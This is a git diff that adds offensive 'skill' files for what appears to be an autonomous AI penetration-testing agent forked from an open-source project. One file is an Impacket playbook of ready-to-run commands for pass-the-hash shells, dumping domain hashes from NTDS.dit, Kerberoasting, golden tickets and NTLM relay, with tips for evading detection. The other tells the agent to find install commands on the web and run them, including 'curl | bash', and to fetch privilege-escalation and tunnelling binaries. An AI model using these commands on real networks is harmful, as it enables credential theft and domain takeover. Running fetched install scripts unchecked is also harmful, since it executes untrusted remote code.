- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
|
@@ -0,0 +1,227 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: impacket
|
|
5
|
+
description: Impacket toolkit — secretsdump, psexec, wmiexec, smbexec, GetUserSPNs, GetNPUsers, ntlmrelayx, ticketer, and other Windows protocol attack tools in Kali Linux
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# Impacket Toolkit
|
|
9
|
+
|
|
10
|
+
Impacket = Python library implementing Windows protocols (SMB, MSRPC, NTLM, Kerberos, LDAP). Contains standalone scripts for most Windows attack scenarios.
|
|
11
|
+
|
|
12
|
+
**Install:**
|
|
13
|
+
```
|
|
14
|
+
pip install impacket --break-system-packages
|
|
15
|
+
sudo apt-get install -y impacket-scripts
|
|
16
|
+
# Verify scripts location:
|
|
17
|
+
which secretsdump.py || find /usr -name "secretsdump.py" 2>/dev/null
|
|
18
|
+
# If not in PATH: python3 /path/to/impacket/examples/secretsdump.py
|
|
19
|
+
```
|
|
20
|
+
|
|
21
|
+
---
|
|
22
|
+
|
|
23
|
+
## Remote Code Execution Scripts
|
|
24
|
+
|
|
25
|
+
### psexec.py — SYSTEM Shell via SMB Named Pipe
|
|
26
|
+
|
|
27
|
+
# With password:
|
|
28
|
+
psexec.py domain/username:password@<target>
|
|
29
|
+
psexec.py administrator:password@<target>
|
|
30
|
+
|
|
31
|
+
# Pass-the-Hash:
|
|
32
|
+
psexec.py administrator@<target> -hashes :<NTLM_hash>
|
|
33
|
+
psexec.py domain/administrator@<target> -hashes :aad3b435b51404eeaad3b435b51404ee:<NTLM>
|
|
34
|
+
|
|
35
|
+
# Run single command:
|
|
36
|
+
psexec.py administrator:password@<target> cmd.exe /c whoami
|
|
37
|
+
|
|
38
|
+
# Note: psexec uploads executable to ADMIN$ share → creates service → loud, detected by EDR
|
|
39
|
+
|
|
40
|
+
### wmiexec.py — Admin Shell via WMI (Stealthier)
|
|
41
|
+
|
|
42
|
+
# With password:
|
|
43
|
+
wmiexec.py domain/administrator:password@<target>
|
|
44
|
+
wmiexec.py administrator:password@<target>
|
|
45
|
+
|
|
46
|
+
# Pass-the-Hash:
|
|
47
|
+
wmiexec.py -hashes :<NTLM> administrator@<target>
|
|
48
|
+
|
|
49
|
+
# Run command only:
|
|
50
|
+
wmiexec.py administrator:password@<target> "ipconfig /all"
|
|
51
|
+
|
|
52
|
+
# PowerShell mode:
|
|
53
|
+
wmiexec.py administrator:password@<target> -shell-type powershell
|
|
54
|
+
|
|
55
|
+
# Note: no service created, uses WMI → much stealthier than psexec
|
|
56
|
+
|
|
57
|
+
### smbexec.py — Shell via SMB Service
|
|
58
|
+
|
|
59
|
+
# Creates temp service via SCManager — runs as SYSTEM:
|
|
60
|
+
smbexec.py administrator:password@<target>
|
|
61
|
+
smbexec.py -hashes :<NTLM> administrator@<target>
|
|
62
|
+
|
|
63
|
+
### atexec.py — Shell via Task Scheduler
|
|
64
|
+
|
|
65
|
+
# Executes command via Windows Task Scheduler:
|
|
66
|
+
atexec.py administrator:password@<target> "whoami"
|
|
67
|
+
atexec.py -hashes :<NTLM> administrator@<target> "net user"
|
|
68
|
+
|
|
69
|
+
### dcomexec.py — Shell via DCOM
|
|
70
|
+
|
|
71
|
+
# Uses DCOM (MMC, ShellWindows, ShellBrowserWindow):
|
|
72
|
+
dcomexec.py administrator:password@<target>
|
|
73
|
+
dcomexec.py -hashes :<NTLM> administrator@<target>
|
|
74
|
+
dcomexec.py -object MMC20 administrator:password@<target>
|
|
75
|
+
|
|
76
|
+
---
|
|
77
|
+
|
|
78
|
+
## Credential Extraction
|
|
79
|
+
|
|
80
|
+
### secretsdump.py — Dump All Hashes
|
|
81
|
+
|
|
82
|
+
# Remote dump (requires admin rights):
|
|
83
|
+
secretsdump.py administrator:password@<target>
|
|
84
|
+
secretsdump.py -hashes :<NTLM> administrator@<target>
|
|
85
|
+
|
|
86
|
+
# Domain Controller — dump NTDS.dit (all domain hashes):
|
|
87
|
+
secretsdump.py domain/administrator:password@<dc_ip>
|
|
88
|
+
secretsdump.py -hashes :<NTLM> domain/administrator@<dc_ip>
|
|
89
|
+
secretsdump.py domain/administrator:password@<dc_ip> -just-dc # Only NTDS, not SAM
|
|
90
|
+
secretsdump.py domain/administrator:password@<dc_ip> -just-dc-ntlm # NTLM only
|
|
91
|
+
|
|
92
|
+
# Local (offline — from downloaded files):
|
|
93
|
+
secretsdump.py LOCAL -sam SAM -system SYSTEM
|
|
94
|
+
secretsdump.py LOCAL -sam SAM -system SYSTEM -security SECURITY
|
|
95
|
+
secretsdump.py LOCAL -ntds NTDS.dit -system SYSTEM
|
|
96
|
+
|
|
97
|
+
# Output format: username:RID:LMhash:NThash:::
|
|
98
|
+
# LM often aad3b435b51404eeaad3b435b51404ee (empty) — only NT matters
|
|
99
|
+
|
|
100
|
+
---
|
|
101
|
+
|
|
102
|
+
## Kerberos Attack Scripts
|
|
103
|
+
|
|
104
|
+
### GetUserSPNs.py — Kerberoasting
|
|
105
|
+
|
|
106
|
+
# List SPNs:
|
|
107
|
+
GetUserSPNs.py domain.local/username:password -dc-ip <dc_ip>
|
|
108
|
+
|
|
109
|
+
# Request TGS tickets (crackable):
|
|
110
|
+
GetUserSPNs.py domain.local/username:password -dc-ip <dc_ip> -request
|
|
111
|
+
GetUserSPNs.py domain.local/username:password -dc-ip <dc_ip> -request -outputfile kerberoast.txt
|
|
112
|
+
|
|
113
|
+
# With hash:
|
|
114
|
+
GetUserSPNs.py domain.local/username -hashes :<NTLM> -dc-ip <dc_ip> -request
|
|
115
|
+
|
|
116
|
+
# Crack output:
|
|
117
|
+
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
|
|
118
|
+
|
|
119
|
+
### GetNPUsers.py — AS-REP Roasting
|
|
120
|
+
|
|
121
|
+
# With user list (no credentials needed):
|
|
122
|
+
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -no-pass -dc-ip <dc_ip>
|
|
123
|
+
|
|
124
|
+
# With credentials (enumerate vulnerable accounts):
|
|
125
|
+
GetNPUsers.py domain.local/username:password -request -format hashcat -dc-ip <dc_ip>
|
|
126
|
+
|
|
127
|
+
# Crack:
|
|
128
|
+
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
|
|
129
|
+
|
|
130
|
+
### getTGT.py — Get TGT Ticket
|
|
131
|
+
|
|
132
|
+
# From password:
|
|
133
|
+
getTGT.py domain.local/username:password -dc-ip <dc_ip>
|
|
134
|
+
|
|
135
|
+
# From NTLM hash (Overpass-the-Hash):
|
|
136
|
+
getTGT.py domain.local/username -hashes :<NTLM> -dc-ip <dc_ip>
|
|
137
|
+
|
|
138
|
+
# From AES key:
|
|
139
|
+
getTGT.py domain.local/username -aesKey <AES256_key> -dc-ip <dc_ip>
|
|
140
|
+
|
|
141
|
+
# Output: username.ccache
|
|
142
|
+
export KRB5CCNAME=username.ccache
|
|
143
|
+
# Use with any -k -no-pass impacket tool
|
|
144
|
+
|
|
145
|
+
### ticketer.py — Golden/Silver Ticket
|
|
146
|
+
|
|
147
|
+
# Golden Ticket:
|
|
148
|
+
ticketer.py -nthash <krbtgt_NTLM> -domain-sid S-1-5-21-xxx -domain domain.local Administrator
|
|
149
|
+
# Silver Ticket (specific service):
|
|
150
|
+
ticketer.py -nthash <service_NTLM> -domain-sid S-1-5-21-xxx -domain domain.local \
|
|
151
|
+
-spn cifs/<server>.domain.local Administrator
|
|
152
|
+
|
|
153
|
+
# Use:
|
|
154
|
+
export KRB5CCNAME=Administrator.ccache
|
|
155
|
+
psexec.py -k -no-pass Administrator@<target>
|
|
156
|
+
|
|
157
|
+
---
|
|
158
|
+
|
|
159
|
+
## NTLM Relay Attack
|
|
160
|
+
|
|
161
|
+
### ntlmrelayx.py — Relay NTLM Auth to Other Systems
|
|
162
|
+
|
|
163
|
+
# Relay to SMB (dump SAM automatically):
|
|
164
|
+
ntlmrelayx.py -tf relay_targets.txt -smb2support
|
|
165
|
+
|
|
166
|
+
# With command execution:
|
|
167
|
+
ntlmrelayx.py -tf relay_targets.txt -smb2support -c "powershell -enc <b64>"
|
|
168
|
+
|
|
169
|
+
# Relay to HTTP (LDAP):
|
|
170
|
+
ntlmrelayx.py -tf relay_targets.txt -smb2support --delegate-access # AD CS attack
|
|
171
|
+
|
|
172
|
+
# Combine with Responder (capture NTLM):
|
|
173
|
+
# Edit /etc/responder/Responder.conf → SMB=Off, HTTP=Off
|
|
174
|
+
sudo responder -I eth0 -dwP &
|
|
175
|
+
ntlmrelayx.py -tf targets.txt -smb2support -i # -i = interactive shell
|
|
176
|
+
|
|
177
|
+
---
|
|
178
|
+
|
|
179
|
+
## SMB Enumeration
|
|
180
|
+
|
|
181
|
+
### lookupsid.py — SID Enumeration
|
|
182
|
+
|
|
183
|
+
# Enumerate users via SID brute force (null session):
|
|
184
|
+
lookupsid.py domain.local/guest@<target>
|
|
185
|
+
lookupsid.py anonymous@<target>
|
|
186
|
+
|
|
187
|
+
### rpcdump.py — RPC Endpoints
|
|
188
|
+
|
|
189
|
+
rpcdump.py <target>
|
|
190
|
+
rpcdump.py domain/username:password@<target>
|
|
191
|
+
|
|
192
|
+
### samrdump.py — SAMR Protocol Enumeration
|
|
193
|
+
|
|
194
|
+
samrdump.py <target>
|
|
195
|
+
samrdump.py domain/username:password@<target>
|
|
196
|
+
# Lists users, groups, shares
|
|
197
|
+
|
|
198
|
+
---
|
|
199
|
+
|
|
200
|
+
## LDAP Queries
|
|
201
|
+
|
|
202
|
+
### ldapdomaindump.py — Full LDAP Dump
|
|
203
|
+
|
|
204
|
+
# pip install ldapdomaindump --break-system-packages
|
|
205
|
+
ldapdomaindump -u 'domain\username' -p 'password' <dc_ip> -o output/ldap/
|
|
206
|
+
# Creates: domain_users.json, domain_computers.json, domain_groups.json, domain_policy.json
|
|
207
|
+
|
|
208
|
+
---
|
|
209
|
+
|
|
210
|
+
## Pro Tips
|
|
211
|
+
|
|
212
|
+
1. `secretsdump.py` on any admin box = instant credential harvest; on DC = entire domain
|
|
213
|
+
2. `wmiexec.py` > `psexec.py` for stealth — no service creation, harder to detect
|
|
214
|
+
3. Chain: `GetNPUsers.py` (no creds) → crack → `GetUserSPNs.py` → crack service accounts → admin
|
|
215
|
+
4. `lookupsid.py guest@target` = null session user enumeration on many AD environments
|
|
216
|
+
5. `ntlmrelayx.py -i` = interactive SMB shell on relay target without any reverse payload
|
|
217
|
+
6. Always try `-hashes :<NTLM>` — most impacket scripts support pass-the-hash natively
|
|
218
|
+
|
|
219
|
+
## Summary
|
|
220
|
+
|
|
221
|
+
Impacket priority order:
|
|
222
|
+
1. `secretsdump.py` (admin creds/hash) → all credentials
|
|
223
|
+
2. `GetNPUsers.py` (user list, no creds) → AS-REP roast → crack → initial foothold
|
|
224
|
+
3. `GetUserSPNs.py` (any domain user) → Kerberoast → crack → service account
|
|
225
|
+
4. `wmiexec.py` (stealthy) or `psexec.py` (SYSTEM) → remote execution
|
|
226
|
+
5. `ntlmrelayx.py` → relay captured NTLM auth to high-value targets
|
|
227
|
+
6. `ticketer.py` (krbtgt hash) → Golden Ticket → permanent DA access
|
|
@@ -0,0 +1,202 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
## INSTALL STRATEGY (HEADLESS + SKILL-AWARE)
|
|
4
|
+
|
|
5
|
+
Before running recon/exploit workflows, pick a toolchain profile and verify tools first.
|
|
6
|
+
|
|
7
|
+
### STEP 0 — Pick Toolchain Profile
|
|
8
|
+
|
|
9
|
+
[Web/API baseline]
|
|
10
|
+
nmap, httpx, katana, ffuf, nuclei, sqlmap, dalfox
|
|
11
|
+
|
|
12
|
+
[Source review / SAST]
|
|
13
|
+
semgrep, bandit, trivy, eslint, jshint
|
|
14
|
+
|
|
15
|
+
[Internal / AD]
|
|
16
|
+
netexec, smbclient, enum4linux-ng, impacket, kerbrute
|
|
17
|
+
|
|
18
|
+
[CTF binary/reverse]
|
|
19
|
+
checksec, strings, objdump, radare2, ropper, pwntools
|
|
20
|
+
|
|
21
|
+
[Mobile Android APK]
|
|
22
|
+
apktool, jadx, apksigner, apkleaks, apkid, adb, frida-tools, objection
|
|
23
|
+
|
|
24
|
+
[Mobile iOS IPA (headless static)]
|
|
25
|
+
unzip, plistutil/plutil, strings, radare2, otool (if available)
|
|
26
|
+
NOTE: full iOS dynamic testing is usually outside this Docker runtime.
|
|
27
|
+
|
|
28
|
+
### STEP 0.1 — Verify Before Install
|
|
29
|
+
|
|
30
|
+
Use this for every required binary:
|
|
31
|
+
which <tool> && (<tool> --version || <tool> --help)
|
|
32
|
+
|
|
33
|
+
If missing, install immediately using the protocol below.
|
|
34
|
+
|
|
35
|
+
### STEP 0.2 — GUI Constraint
|
|
36
|
+
|
|
37
|
+
If a workflow requires GUI-only tooling, switch to CLI alternatives first.
|
|
38
|
+
Examples:
|
|
39
|
+
- jadx-gui -> jadx (CLI output dir)
|
|
40
|
+
- Burp GUI -> caido-cli / curl replay / http framework
|
|
41
|
+
- MobSF web UI -> static CLI chain (apktool + jadx + apkleaks + apkid)
|
|
42
|
+
|
|
43
|
+
## TOOL MISSING — AUTO-INSTALL PROTOCOL:
|
|
44
|
+
|
|
45
|
+
When a command returns "command not found" or `which <tool>` returns empty:
|
|
46
|
+
|
|
47
|
+
### STEP 1 — Try known install methods first (fastest):
|
|
48
|
+
|
|
49
|
+
[Standard Kali tools]:
|
|
50
|
+
→ sudo apt-get update && sudo apt-get install -y <tool>
|
|
51
|
+
→ OR: go install github.com/projectdiscovery/<tool>/cmd/<tool>@latest
|
|
52
|
+
|
|
53
|
+
[Python tools]:
|
|
54
|
+
→ pip install <tool> --break-system-packages (try the exact package name first)
|
|
55
|
+
→ If pip name differs from binary name: web_search "<tool> pip install"
|
|
56
|
+
→ Example: metagoofil → pip install metagoofil
|
|
57
|
+
→ Example: porch-pirate → pip install porch-pirate
|
|
58
|
+
→ Example: postleaksNg → pip install postleaks-ng
|
|
59
|
+
→ Example: corsy → pip install corsy
|
|
60
|
+
|
|
61
|
+
[Go tools]:
|
|
62
|
+
→ go install github.com/<author>/<tool>/cmd/<tool>@latest
|
|
63
|
+
→ OR: which go || sudo apt-get install -y golang-go
|
|
64
|
+
|
|
65
|
+
[GitHub tools]:
|
|
66
|
+
1. web_search "<tool> github install" to find exact repo URL
|
|
67
|
+
2. git clone <repo_url> /home/pentester/tools/<tool>/
|
|
68
|
+
3. cd /home/pentester/tools/<tool>/
|
|
69
|
+
4. pip install -r requirements.txt OR npm install OR make
|
|
70
|
+
5. Run via: python3 /home/pentester/tools/<tool>/<script>.py
|
|
71
|
+
|
|
72
|
+
### STEP 2 — If STEP 1 fails or tool is unknown: WEB SEARCH + READ URL
|
|
73
|
+
|
|
74
|
+
When apt/pip/go install fails, or you don't know where the tool is published:
|
|
75
|
+
|
|
76
|
+
MANDATORY FLOW:
|
|
77
|
+
1. web_search("<tool name> install kali linux")
|
|
78
|
+
OR web_search("<tool name> github")
|
|
79
|
+
OR web_search("<tool name> installation guide")
|
|
80
|
+
|
|
81
|
+
2. From the search results, identify the most relevant URL:
|
|
82
|
+
- Prefer: official GitHub repo (github.com/author/tool)
|
|
83
|
+
- Prefer: official documentation site
|
|
84
|
+
- Avoid: random blog posts (use only if no official source found)
|
|
85
|
+
|
|
86
|
+
3. Open the URL using browser_action to read the full installation instructions:
|
|
87
|
+
browser_action(action="navigate", url="<url_from_search_results>")
|
|
88
|
+
# Read the README, Installation section, or docs page
|
|
89
|
+
# Look for: "Installation", "Install", "Getting Started", "Usage"
|
|
90
|
+
|
|
91
|
+
4. Extract the exact install commands from the page:
|
|
92
|
+
# Common patterns to look for:
|
|
93
|
+
# go install ...
|
|
94
|
+
# pip install ...
|
|
95
|
+
# apt-get install ...
|
|
96
|
+
# wget ... && chmod +x ...
|
|
97
|
+
# git clone ... && cd ... && make
|
|
98
|
+
# curl -sSL ... | bash
|
|
99
|
+
|
|
100
|
+
5. Execute the extracted install commands in the Docker Kali sandbox
|
|
101
|
+
|
|
102
|
+
6. Verify install succeeded:
|
|
103
|
+
which <tool>
|
|
104
|
+
<tool> --version OR <tool> --help
|
|
105
|
+
|
|
106
|
+
EXAMPLE WORKFLOW:
|
|
107
|
+
# Tool "feroxbuster" not found:
|
|
108
|
+
web_search("feroxbuster install kali linux")
|
|
109
|
+
# Gets result: https://github.com/epi052/feroxbuster
|
|
110
|
+
browser_action(action="navigate", url="https://github.com/epi052/feroxbuster")
|
|
111
|
+
# Reads: "curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/main/install-nix.sh | bash"
|
|
112
|
+
# Executes that command
|
|
113
|
+
which feroxbuster # confirms install
|
|
114
|
+
|
|
115
|
+
### STEP 3 — If tool still not installable:
|
|
116
|
+
|
|
117
|
+
Fall back to equivalent alternative:
|
|
118
|
+
- feroxbuster / gobuster → use ffuf (already installed)
|
|
119
|
+
- masscan → use nmap --min-rate 5000
|
|
120
|
+
- enum4linux → use enum4linux-ng
|
|
121
|
+
- netcat → use ncat or socat
|
|
122
|
+
- python2 tool → try python3 with 2to3 conversion
|
|
123
|
+
|
|
124
|
+
Document the fallback: note which tool was unavailable and what was used instead.
|
|
125
|
+
|
|
126
|
+
[Known installs for new Phase 1 tools]:
|
|
127
|
+
metagoofil → pip install metagoofil --break-system-packages
|
|
128
|
+
porch-pirate → pip install porch-pirate --break-system-packages
|
|
129
|
+
postleaksNg → git clone https://github.com/cosad3s/postleaksNg /home/pentester/tools/postleaksNg && pip install -r /home/pentester/tools/postleaksNg/requirements.txt --break-system-packages
|
|
130
|
+
SwaggerSpy → git clone https://github.com/UndeadSec/SwaggerSpy /home/pentester/tools/SwaggerSpy && pip install -r /home/pentester/tools/SwaggerSpy/requirements.txt --break-system-packages
|
|
131
|
+
alterx → go install github.com/projectdiscovery/alterx/cmd/alterx@latest
|
|
132
|
+
shuffledns → go install github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
|
|
133
|
+
puredns → go install github.com/d3mondev/puredns/v2@latest
|
|
134
|
+
vita → go install github.com/junnlikestea/vita@latest
|
|
135
|
+
shosubgo → go install github.com/incogbyte/shosubgo@latest
|
|
136
|
+
github-subdomains → go install github.com/gwen001/github-subdomains@latest
|
|
137
|
+
chaos → go install github.com/projectdiscovery/chaos-client/cmd/chaos@latest
|
|
138
|
+
findomain → sudo apt-get install -y findomain OR cargo install findomain
|
|
139
|
+
waymore → pip install waymore --break-system-packages
|
|
140
|
+
uro → pip install uro --break-system-packages
|
|
141
|
+
kiterunner → wget https://github.com/assetnote/kiterunner/releases/latest/download/kr_linux_amd64 -O /usr/local/bin/kr && chmod +x /usr/local/bin/kr
|
|
142
|
+
corsy → pip install corsy --break-system-packages
|
|
143
|
+
cariddi → go install github.com/edoardottt/cariddi/cmd/cariddi@latest
|
|
144
|
+
ghauri → pip install ghauri --break-system-packages
|
|
145
|
+
retire → npm install -g retire
|
|
146
|
+
hakrawler → go install github.com/hakluke/hakrawler@latest
|
|
147
|
+
interactsh-client → go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
|
|
148
|
+
toxicache → go install github.com/OJ/gobuster/v3@latest (different, check first)
|
|
149
|
+
nosqli → pip install nosqli --break-system-packages
|
|
150
|
+
headi → go install github.com/mlcsec/headi@latest
|
|
151
|
+
crlfuzz → go install github.com/dwisiswant0/crlfuzz/cmd/crlfuzz@latest
|
|
152
|
+
nrich → go install github.com/projectdiscovery/nrich/cmd/nrich@latest
|
|
153
|
+
asnmap → go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest
|
|
154
|
+
mapcidr → go install github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest
|
|
155
|
+
dnsx → go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
|
|
156
|
+
subfinder → go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
|
|
157
|
+
kerbrute → go install github.com/ropnop/kerbrute@latest OR wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O /usr/local/bin/kerbrute && chmod +x /usr/local/bin/kerbrute
|
|
158
|
+
ROPgadget → pip install ropgadget --break-system-packages
|
|
159
|
+
pwntools → pip install pwntools --break-system-packages
|
|
160
|
+
pwndbg → git clone https://github.com/pwndbg/pwndbg /home/pentester/tools/pwndbg && cd /home/pentester/tools/pwndbg && ./setup.sh
|
|
161
|
+
impacket → pip install impacket --break-system-packages OR sudo apt-get install -y impacket-scripts
|
|
162
|
+
evil-winrm → sudo gem install evil-winrm OR sudo apt-get install -y evil-winrm
|
|
163
|
+
crackmapexec → sudo apt-get install -y crackmapexec OR pip install netexec --break-system-packages
|
|
164
|
+
pypykatz → pip install pypykatz --break-system-packages
|
|
165
|
+
ldapdomaindump → pip install ldapdomaindump --break-system-packages
|
|
166
|
+
chisel → wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz -O /tmp/c.gz && gunzip /tmp/c.gz && mv /tmp/c /home/pentester/tools/chisel && chmod +x /home/pentester/tools/chisel
|
|
167
|
+
ligolo-ng → wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/proxy_linux_amd64 -O /home/pentester/tools/ligolo-proxy && chmod +x /home/pentester/tools/ligolo-proxy; wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/agent_linux_amd64 -O /home/pentester/tools/ligolo-agent && chmod +x /home/pentester/tools/ligolo-agent
|
|
168
|
+
linpeas → wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O /home/pentester/tools/linpeas.sh && chmod +x /home/pentester/tools/linpeas.sh
|
|
169
|
+
winpeas → wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -O /home/pentester/tools/winpeas.exe
|
|
170
|
+
GodPotato → wget https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe -O /home/pentester/tools/GodPotato.exe
|
|
171
|
+
PrintSpoofer → wget https://github.com/itm4n/PrintSpoofer/releases/latest/download/PrintSpoofer64.exe -O /home/pentester/tools/PrintSpoofer64.exe
|
|
172
|
+
RsaCtfTool → git clone https://github.com/RsaCtfTool/RsaCtfTool /home/pentester/tools/RsaCtfTool && pip install -r /home/pentester/tools/RsaCtfTool/requirements.txt --break-system-packages
|
|
173
|
+
stegseek → wget https://github.com/RickdeJager/stegseek/releases/latest/download/stegseek_0.6-1.deb -O /tmp/stegseek.deb && sudo dpkg -i /tmp/stegseek.deb
|
|
174
|
+
volatility3 → pip install volatility3 --break-system-packages OR sudo apt-get install -y volatility3
|
|
175
|
+
nosqlmap → git clone https://github.com/codingo/NoSQLMap /home/pentester/tools/nosqlmap && pip install -r /home/pentester/tools/nosqlmap/requirements.txt --break-system-packages
|
|
176
|
+
enum4linux-ng → sudo apt-get install -y enum4linux-ng OR pip install enum4linux-ng --break-system-packages
|
|
177
|
+
hash-identifier → sudo apt-get install -y hash-identifier
|
|
178
|
+
hashid → pip install hashid --break-system-packages
|
|
179
|
+
cewl → sudo apt-get install -y cewl
|
|
180
|
+
snmp-check → sudo apt-get install -y snmp-check
|
|
181
|
+
onesixtyone → sudo apt-get install -y onesixtyone
|
|
182
|
+
dnsrecon → sudo apt-get install -y dnsrecon
|
|
183
|
+
dnsenum → sudo apt-get install -y dnsenum
|
|
184
|
+
fierce → sudo apt-get install -y fierce
|
|
185
|
+
dnsgen → pip install dnsgen --break-system-packages
|
|
186
|
+
padbuster → sudo apt-get install -y padbuster
|
|
187
|
+
apktool → sudo apt-get install -y apktool
|
|
188
|
+
jadx → sudo apt-get install -y jadx
|
|
189
|
+
apksigner → sudo apt-get install -y apksigner
|
|
190
|
+
adb → sudo apt-get install -y adb fastboot OR sudo apt-get install -y android-sdk-platform-tools
|
|
191
|
+
apkleaks → pip install apkleaks --break-system-packages
|
|
192
|
+
apkid → pip install apkid --break-system-packages
|
|
193
|
+
frida-tools → pip install frida-tools --break-system-packages
|
|
194
|
+
objection → pip install objection --break-system-packages
|
|
195
|
+
mobsf → docker pull opensecurity/mobile-security-framework-mobsf && docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf (if Docker-in-Docker available)
|
|
196
|
+
oletools → pip install oletools --break-system-packages
|
|
197
|
+
stegoveritas → pip install stegoveritas --break-system-packages
|
|
198
|
+
zsteg → sudo gem install zsteg
|
|
199
|
+
ropper → pip install ropper --break-system-packages OR sudo apt-get install -y ropper
|
|
200
|
+
r2ghidra → r2pm -ci r2ghidra (inside radare2 after: sudo apt-get install -y radare2)
|
|
201
|
+
metasploit → sudo apt-get install -y metasploit-framework && sudo msfdb init
|
|
202
|
+
---
|